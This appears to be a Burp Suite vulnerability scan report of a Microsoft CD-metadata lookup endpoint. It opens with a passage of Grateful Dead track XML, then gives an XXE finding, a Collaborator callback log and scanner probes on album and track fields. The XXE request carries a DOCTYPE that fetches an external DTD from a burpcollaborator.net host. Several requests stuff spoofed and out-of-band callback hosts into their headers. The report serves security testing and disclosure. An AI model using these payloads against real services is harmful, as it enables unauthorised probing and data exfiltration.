<text>Throwing Stones</text>
<word>Throwing</word>
<word>Stones</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>4</trackNumber>
<filename>3-04 Throwing Stones.m4a</filename>
<trackDuration>539469</trackDuration>
<bitrate>276512</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>19</trackRequestID>
</track>
<track>
<title>
<text>It Must Have Been the Roses</text>
<word>It</word>
<word>Must</word>
<word>Have</word>
<word>Been</word>
<word>the</word>
<word>Roses</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>5</trackNumber>
<filename>1-05 It Must Have Been the Roses.m4a</filename>
<trackDuration>345977</trackDuration>
<bitrate>263432</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>4</trackRequestID>
</track>
<track>
<title>
<text>Boston Clam Jam</text>
<word>Boston</word>
<word>Clam</word>
<word>Jam</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>5</trackNumber>
<filename>2-05 Boston Clam Jam.m4a</filename>
<trackDuration>337409</trackDuration>
<bitrate>274216</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>13</trackRequestID>
</track>
<track>
<title>
<text>Not Fade Away</text>
<word>Not</word>
<word>Fade</word>
<word>Away</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>5</trackNumber>
<filename>3-05 Not Fade Away.m4a</filename>
<trackDuration>541791</trackDuration>
<bitrate>262816</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>20</trackRequestID>
</track>
<track>
<title>
<text>Dire Wolf</text>
<word>Dire</word>
<word>Wolf</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>6</trackNumber>
<filename>1-06 Dire Wolf.m4a</filename>
<trackDuration>239653</trackDuration>
<bitrate>263096</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>5</trackRequestID>
</track>
<track>
<title>
<text>Drums</text>
<word>Drums</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>6</trackNumber>
<filename>2-06 Drums.m4a</filename>
<trackDuration>664764</trackDuration>
<bitrate>265960</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>14</trackRequestID>
</track>
<track>
<title>
<text>The Mighty Quinn</text>
<word>The</word>
<word>Mighty</word>
<word>Quinn</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>6</trackNumber>
<filename>3-06 The Mighty Quinn.m4a</filename>
<trackDuration>281054</trackDuration>
<bitrate>263256</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>21</trackRequestID>
</track>
<track>
<title>
<text>Queen Jane Approximately</text>
<word>Queen</word>
<word>Jane</word>
<word>Approximately</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>7</trackNumber>
<filename>1-07 Queen Jane Approximately.m4a</filename>
<trackDuration>436883</trackDuration>
<bitrate>269672</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>6</trackRequestID>
</track>
<track>
<title>
<text>Space</text>
<word>Space</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>7</trackNumber>
<filename>2-07 Space.m4a</filename>
<trackDuration>495537</trackDuration>
<bitrate>261064</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>15</trackRequestID>
</track>
<track>
<title>
<text>Samson and Delilah</text>
<word>Samson</word>
<word>and</word>
<word>Delilah</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>7</trackNumber>
<filename>3-07 Samson and Delilah.m4a</filename>
<trackDuration>467348</trackDuration>
<bitrate>279320</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>22</trackRequestID>
</track>
<track>
<title>
<text>Tennessee Jed</text>
<word>Tennessee</word>
<word>Jed</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>8</trackNumber>
<filename>1-08 Tennessee Jed.m4a</filename>
<trackDuration>470366</trackDuration>
<bitrate>268080</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>7</trackRequestID>
</track>
<track>
<title>
<text>Eyes of the World</text>
<word>Eyes</word>
<word>of</word>
<word>the</word>
<word>World</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>8</trackNumber>
<filename>3-08 Eyes of the World.m4a</filename>
<trackDuration>1410078</trackDuration>
<bitrate>276416</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>23</trackRequestID>
</track>
<track>
<title>
<text>The Music Never Stopped</text>
<word>The</word>
<word>Music</word>
<word>Never</word>
<word>Stopped</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>9</trackNumber>
<filename>1-09 The Music Never Stopped.m4a</filename>
<trackDuration>498718</trackDuration>
<bitrate>273520</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>8</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Collaborator HTTP interaction

The Collaborator server received an HTTP request.

The request was received from IP address 157.56.59.219 at 2017-Sep-03 23:38:03 UTC.

Request to Collaborator

GET / HTTP/1.1
Host: 0ef2etb5zrz2s7af9rgkxi8fi6oxeld940rqff.burpcollaborator.net
Connection: Keep-Alive

Response from Collaborator

4. XXE via POST Request
Previous Next

Summary

	Severity:	High
	Confidence:	Firm
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/cdinfo/getmdrcd.aspx

Note: This issue was generated by the Burp extension: Active Scan++.

Issue detail

The application appears to be vulnerable to standard XML eXternal Entity (XXE) via a crafted POST request. Check the following URL for various method/payload choices: https://web-in-security.blogspot.it/2016/03/xxe-cheat-sheet.html

Request

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=CBE2B824-3137-46F9-BB77-34691DDF35AC&pb2z410=1 HTTP/1.1
Accept: */*
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 151
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE data SYSTEM "http://0nocpbosscrjdhpaohku4zaap1vrjg.burpcollaborator.net/scanner.dtd"><data>&all;</data>

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 24 Feb 2019 16:42:10 GMT
Connection: close

<METADATA><mdqRequestID>CBE2B824-3137-46F9-BB77-34691DDF35AC</mdqRequestID><ResponseCode>Error: Parse Error</ResponseCode><ResponseCode>Expected DTD markup was not found. Line 1, position 1.</ResponseCode><Backoff><Time>15</Time></Backoff><L2Threshold>0.14</L2Threshold></METADATA>

5. Interesting input handling: Magic value: empty
Previous Next

There are 8 instances of this issue:

/cdinfo/getmdrcd.aspx [text XML parameter]
/cdinfo/getmdrcd.aspx [word XML parameter]
/cdinfo/getmdrcd.aspx [word XML parameter]
/cdinfo/getmdrcd.aspx [word XML parameter]
/cdinfo/getmdrcd.aspx [word XML parameter]
/cdinfo/getmdrcd.aspx [word XML parameter]
/cdinfo/getmdrcd.aspx [word XML parameter]
/cdinfo/getmdrcd.aspx [word XML parameter]

5.1. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [text XML parameter]
Previous Next

Summary

	Severity:	Medium
	Confidence:	Firm
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/cdinfo/getmdrcd.aspx

Note: This issue was generated by the Burp extension: Backslash Powered Scanner.

Issue detail

The application reacts to inputs in a way that suggests it might be vulnerable to some kind of server-side code injection. The probes are listed below in chronological order, with evidence. Response attributes that only stay consistent in one probe-set are italicised, with the variable attribute starred.

Successful probes

Magic value: empty	empty	ezpty
word_count	87	80
whole_body_content	X	Y
content_length	5668	5703
limited_body_content	X	Y

Remediation detail

This issue does not necessarily indicate a vulnerability; it is merely highlighting behaviour worthy of manual investigation. Try to determine the root cause of the observed behaviour.Refer to Backslash Powered Scanning for further details and guidance interpreting results.

Request 1

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=D67D6A13-00C5-45E1-AF80-C713DA821D1E&xqr83o8=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@66afwfb3tfn8voc8by8kychvtmzdxiw6l.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 1194
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://604fqf53nfh8po685y2kscbvnmtdrii67.burpcollaborator.net/ref
X-Real-IP: spoofed.rfa050ko20wt49ltkjh57xqg278y63yrn.burpcollaborator.net
Forwarded: for=spoofed.cvblll09ilceku1e04xqni61isojmofc4.burpcollaborator.net;by=spoofed.cvblll09ilceku1e04xqni61isojmofc4.burpcollaborator.net;host=spoofed.cvblll09ilceku1e04xqni61isojmofc4.burpcollaborator.net
X-Forwarded-For: spoofed.ct9ljly9glaeiuzey4vqli41gsmjkoec3.burpcollaborator.net
Contact: root@hk5qaqpe7q1j9zqjp9mvcnv67xdobt6hv.burpcollaborator.net
From: root@h3lqtq8eqqkjsz9j895vvne6qxwoutqhf.burpcollaborator.net
True-Client-IP: spoofed.2jmb9boz6b048kp4oulgb8ur6ic9ae72w.burpcollaborator.net
X-Wap-Profile: http://tda232iq02uv2bjvilf75zoi0960452tr.burpcollaborator.net/wap.xml
Client-ip: spoofed.7gog6gl43gx95pm9lzil8drw3n9e7j77w.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>D67D6A13-00C5-45E1-AF80-C713DA821D1E</mdqRequestID>
<album>
<title>
<text>empty</text>
<word>Running</word>
<word>On</word>
<word>Empty</word>
</title>
<artist>
<text>Jackson Browne</text>
<word>Jackson</word>
<word>Browne</word>
</artist>
</album>
<track>
<title>
<text>Running On Empty</text>
<word>Running</word>
<word>On</word>
<word>Empty</word>
</title>
<artist>
<text>Jackson Browne</text>
<word>Jackson</word>
<word>Browne</word>
</artist>
<trackNumber>1</trackNumber>
<filename>01 Running On Empty.m4a</filename>
<trackDuration>298097</trackDuration>
<bitrate>263248</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 1

Request 2

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=D67D6A13-00C5-45E1-AF80-C713DA821D1E&v8ou2wkfl7=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@66afwfb3tfn8voc8by8kychvtmzdxiw6l.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 1194
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://604fqf53nfh8po685y2kscbvnmtdrii67.burpcollaborator.net/ref
X-Real-IP: spoofed.rfa050ko20wt49ltkjh57xqg278y63yrn.burpcollaborator.net
Forwarded: for=spoofed.cvblll09ilceku1e04xqni61isojmofc4.burpcollaborator.net;by=spoofed.cvblll09ilceku1e04xqni61isojmofc4.burpcollaborator.net;host=spoofed.cvblll09ilceku1e04xqni61isojmofc4.burpcollaborator.net
X-Forwarded-For: spoofed.ct9ljly9glaeiuzey4vqli41gsmjkoec3.burpcollaborator.net
Contact: root@hk5qaqpe7q1j9zqjp9mvcnv67xdobt6hv.burpcollaborator.net
From: root@h3lqtq8eqqkjsz9j895vvne6qxwoutqhf.burpcollaborator.net
True-Client-IP: spoofed.2jmb9boz6b048kp4oulgb8ur6ic9ae72w.burpcollaborator.net
X-Wap-Profile: http://tda232iq02uv2bjvilf75zoi0960452tr.burpcollaborator.net/wap.xml
Client-ip: spoofed.7gog6gl43gx95pm9lzil8drw3n9e7j77w.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>D67D6A13-00C5-45E1-AF80-C713DA821D1E</mdqRequestID>
<album>
<title>
<text>zmpty</text>
<word>Running</word>
<word>On</word>
<word>Empty</word>
</title>
<artist>
<text>Jackson Browne</text>
<word>Jackson</word>
<word>Browne</word>
</artist>
</album>
<track>
<title>
<text>Running On Empty</text>
<word>Running</word>
<word>On</word>
<word>Empty</word>
</title>
<artist>
<text>Jackson Browne</text>
<word>Jackson</word>
<word>Browne</word>
</artist>
<trackNumber>1</trackNumber>
<filename>01 Running On Empty.m4a</filename>
<trackDuration>298097</trackDuration>
<bitrate>263248</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 2

5.2. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [word XML parameter]
Previous Next

Summary

	Severity:	Medium
	Confidence:	Firm
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/cdinfo/getmdrcd.aspx

Note: This issue was generated by the Burp extension: Backslash Powered Scanner.

Issue detail

Magic value: undefined	undefined	uzdefined
word_count	72	3
whole_body_content	X	Y
content_length	5616	227
limited_body_content	X	Y

Magic value: empty	empty	ezpty
word_count	72	3
whole_body_content	X	Y
content_length	5616	227
limited_body_content	X	Y

Remediation detail

Request 1

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=191ACF5C-B28F-40FB-A9B0-29F3A49AA2D7&m265mm3353=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@rzu0p04om0gto95t4j15rxagm7syq1rpg.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 1168
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://2orbebtzbb54dku4tuqgg8zrbih9fc80x.burpcollaborator.net/ref
X-Real-IP: spoofed.bq5kgkv8dk7dftwdv3spih10drjihlb90.burpcollaborator.net
Forwarded: for=spoofed.z558v8aws8m1uhb1ar7dx5gosfy6w9rxg.burpcollaborator.net;by=spoofed.z558v8aws8m1uhb1ar7dx5gosfy6w9rxg.burpcollaborator.net;host=spoofed.z558v8aws8m1uhb1ar7dx5gosfy6w9rxg.burpcollaborator.net
X-Forwarded-For: spoofed.a1cjrj67ojicqs7c623otgczoquhsko8d.burpcollaborator.net
Contact: root@yvx7l70vi7c0kg100qxcn46nieo5m8jw8.burpcollaborator.net
From: root@1tvajayygaa3ijz3ytvfl74qghm8kbiz7.burpcollaborator.net
True-Client-IP: spoofed.94biui96rilbtrab916nwffyrpxgvju7j.burpcollaborator.net
X-Wap-Profile: http://f5lovoacsomhuxbha77txlg4svymwpwdl.burpcollaborator.net/wap.xml
Client-ip: spoofed.ih3r7rmf4ryk60nkmajw9os74yap8sagz.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>191ACF5C-B28F-40FB-A9B0-29F3A49AA2D7</mdqRequestID>
<album>
<title>
<text>Jackson Browne</text>
<word>Jackson</word>
<word>Browne</word>
</title>
<artist>
<text>Jackson Browne</text>
<word>Jackson</word>
<word>Browne</word>
</artist>
</album>
<track>
<title>
<text>Doctor My Eyes</text>
<word>undefined</word>
<word>My</word>
<word>Eyes</word>
</title>
<artist>
<text>Jackson Browne</text>
<word>Jackson</word>
<word>Browne</word>
</artist>
<trackNumber>4</trackNumber>
<filename>04 Doctor My Eyes.m4a</filename>
<trackDuration>199970</trackDuration>
<bitrate>262032</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 1

Request 2

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=191ACF5C-B28F-40FB-A9B0-29F3A49AA2D7&j65wkhnc2=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@rzu0p04om0gto95t4j15rxagm7syq1rpg.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 1168
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://2orbebtzbb54dku4tuqgg8zrbih9fc80x.burpcollaborator.net/ref
X-Real-IP: spoofed.bq5kgkv8dk7dftwdv3spih10drjihlb90.burpcollaborator.net
Forwarded: for=spoofed.z558v8aws8m1uhb1ar7dx5gosfy6w9rxg.burpcollaborator.net;by=spoofed.z558v8aws8m1uhb1ar7dx5gosfy6w9rxg.burpcollaborator.net;host=spoofed.z558v8aws8m1uhb1ar7dx5gosfy6w9rxg.burpcollaborator.net
X-Forwarded-For: spoofed.a1cjrj67ojicqs7c623otgczoquhsko8d.burpcollaborator.net
Contact: root@yvx7l70vi7c0kg100qxcn46nieo5m8jw8.burpcollaborator.net
From: root@1tvajayygaa3ijz3ytvfl74qghm8kbiz7.burpcollaborator.net
True-Client-IP: spoofed.94biui96rilbtrab916nwffyrpxgvju7j.burpcollaborator.net
X-Wap-Profile: http://f5lovoacsomhuxbha77txlg4svymwpwdl.burpcollaborator.net/wap.xml
Client-ip: spoofed.ih3r7rmf4ryk60nkmajw9os74yap8sagz.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>191ACF5C-B28F-40FB-A9B0-29F3A49AA2D7</mdqRequestID>
<album>
<title>
<text>Jackson Browne</text>
<word>Jackson</word>
<word>Browne</word>
</title>
<artist>
<text>Jackson Browne</text>
<word>Jackson</word>
<word>Browne</word>
</artist>
</album>
<track>
<title>
<text>Doctor My Eyes</text>
<word>zndefined</word>
<word>My</word>
<word>Eyes</word>
</title>
<artist>
<text>Jackson Browne</text>
<word>Jackson</word>
<word>Browne</word>
</artist>
<trackNumber>4</trackNumber>
<filename>04 Doctor My Eyes.m4a</filename>
<trackDuration>199970</trackDuration>
<bitrate>262032</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 2

Request 3

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=191ACF5C-B28F-40FB-A9B0-29F3A49AA2D7&nhncvs5=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@rzu0p04om0gto95t4j15rxagm7syq1rpg.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 1164
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://2orbebtzbb54dku4tuqgg8zrbih9fc80x.burpcollaborator.net/ref
X-Real-IP: spoofed.bq5kgkv8dk7dftwdv3spih10drjihlb90.burpcollaborator.net
Forwarded: for=spoofed.z558v8aws8m1uhb1ar7dx5gosfy6w9rxg.burpcollaborator.net;by=spoofed.z558v8aws8m1uhb1ar7dx5gosfy6w9rxg.burpcollaborator.net;host=spoofed.z558v8aws8m1uhb1ar7dx5gosfy6w9rxg.burpcollaborator.net
X-Forwarded-For: spoofed.a1cjrj67ojicqs7c623otgczoquhsko8d.burpcollaborator.net
Contact: root@yvx7l70vi7c0kg100qxcn46nieo5m8jw8.burpcollaborator.net
From: root@1tvajayygaa3ijz3ytvfl74qghm8kbiz7.burpcollaborator.net
True-Client-IP: spoofed.94biui96rilbtrab916nwffyrpxgvju7j.burpcollaborator.net
X-Wap-Profile: http://f5lovoacsomhuxbha77txlg4svymwpwdl.burpcollaborator.net/wap.xml
Client-ip: spoofed.ih3r7rmf4ryk60nkmajw9os74yap8sagz.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>191ACF5C-B28F-40FB-A9B0-29F3A49AA2D7</mdqRequestID>
<album>
<title>
<text>Jackson Browne</text>
<word>Jackson</word>
<word>Browne</word>
</title>
<artist>
<text>Jackson Browne</text>
<word>Jackson</word>
<word>Browne</word>
</artist>
</album>
<track>
<title>
<text>Doctor My Eyes</text>
<word>empty</word>
<word>My</word>
<word>Eyes</word>
</title>
<artist>
<text>Jackson Browne</text>
<word>Jackson</word>
<word>Browne</word>
</artist>
<trackNumber>4</trackNumber>
<filename>04 Doctor My Eyes.m4a</filename>
<trackDuration>199970</trackDuration>
<bitrate>262032</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 3

Request 4

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=191ACF5C-B28F-40FB-A9B0-29F3A49AA2D7&nyy39aaq3g6=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@rzu0p04om0gto95t4j15rxagm7syq1rpg.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 1164
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://2orbebtzbb54dku4tuqgg8zrbih9fc80x.burpcollaborator.net/ref
X-Real-IP: spoofed.bq5kgkv8dk7dftwdv3spih10drjihlb90.burpcollaborator.net
Forwarded: for=spoofed.z558v8aws8m1uhb1ar7dx5gosfy6w9rxg.burpcollaborator.net;by=spoofed.z558v8aws8m1uhb1ar7dx5gosfy6w9rxg.burpcollaborator.net;host=spoofed.z558v8aws8m1uhb1ar7dx5gosfy6w9rxg.burpcollaborator.net
X-Forwarded-For: spoofed.a1cjrj67ojicqs7c623otgczoquhsko8d.burpcollaborator.net
Contact: root@yvx7l70vi7c0kg100qxcn46nieo5m8jw8.burpcollaborator.net
From: root@1tvajayygaa3ijz3ytvfl74qghm8kbiz7.burpcollaborator.net
True-Client-IP: spoofed.94biui96rilbtrab916nwffyrpxgvju7j.burpcollaborator.net
X-Wap-Profile: http://f5lovoacsomhuxbha77txlg4svymwpwdl.burpcollaborator.net/wap.xml
Client-ip: spoofed.ih3r7rmf4ryk60nkmajw9os74yap8sagz.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>191ACF5C-B28F-40FB-A9B0-29F3A49AA2D7</mdqRequestID>
<album>
<title>
<text>Jackson Browne</text>
<word>Jackson</word>
<word>Browne</word>
</title>
<artist>
<text>Jackson Browne</text>
<word>Jackson</word>
<word>Browne</word>
</artist>
</album>
<track>
<title>
<text>Doctor My Eyes</text>
<word>zmpty</word>
<word>My</word>
<word>Eyes</word>
</title>
<artist>
<text>Jackson Browne</text>
<word>Jackson</word>
<word>Browne</word>
</artist>
<trackNumber>4</trackNumber>
<filename>04 Doctor My Eyes.m4a</filename>
<trackDuration>199970</trackDuration>
<bitrate>262032</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 4

5.3. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [word XML parameter]
Previous Next

Summary

	Severity:	Medium
	Confidence:	Firm
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/cdinfo/getmdrcd.aspx

Note: This issue was generated by the Burp extension: Backslash Powered Scanner.

Issue detail

Magic value: undefined	undefined	uzdefined
word_count	125	3
whole_body_content	X	Y
content_length	7062	227
limited_body_content	X	Y

Magic value: empty	empty	ezpty
word_count	125	3
whole_body_content	X	Y
content_length	7062	227
limited_body_content	X	Y

Remediation detail

Request 1

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=5FF01FB3-DC52-43A7-B976-24D8046AA42D&v4gos7=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@a0bjqj57njhcps6c522osgbznqthndk19.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 1085
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://sxt1n12pk1euma3u2kz6py8hk8qzkupie.burpcollaborator.net/ref
X-Real-IP: spoofed.e3intn8bqnkgsw9g865svke3quwlqhg55.burpcollaborator.net
Forwarded: for=spoofed.mrhvhvwjev8og4xowet0js2be2ktep5du.burpcollaborator.net;by=spoofed.mrhvhvwjev8og4xowet0js2be2ktep5du.burpcollaborator.net;host=spoofed.mrhvhvwjev8og4xowet0js2be2ktep5du.burpcollaborator.net
X-Forwarded-For: spoofed.dubmkmzahmbfjv0fz5wrmj52htnkhg94y.burpcollaborator.net
Contact: root@aesj4jj71jvc3skcj2go6gpz1q7h1du1j.burpcollaborator.net
From: root@k2ntst7hptjmr28m7c4yuqd9p0vrpnjb8.burpcollaborator.net
True-Client-IP: spoofed.u1w3r36ro3iwqc7w6m38t0cjoau1oxjl8.burpcollaborator.net
X-Wap-Profile: http://ewenmn1bjndglw2g16ysok73jupljhf54.burpcollaborator.net/wap.xml
Client-ip: spoofed.c2flsl79pljeru8e744quid1psvjpfn3c.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>5FF01FB3-DC52-43A7-B976-24D8046AA42D</mdqRequestID>
<album>
<title>
<text>Metamorphosis</text>
<word>Metamorphosis</word>
</title>
<artist>
<text>Hilary Duff</text>
<word>Hilary</word>
<word>Duff</word>
</artist>
</album>
<track>
<title>
<text>So Yesterday</text>
<word>So</word>
<word>undefined</word>
</title>
<artist>
<text>Hilary Duff</text>
<word>Hilary</word>
<word>Duff</word>
</artist>
<trackNumber>1</trackNumber>
<filename>01 So Yesterday.m4a</filename>
<trackDuration>215341</trackDuration>
<bitrate>262264</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 04 Sep 2017 01:20:01 GMT
Connection: close

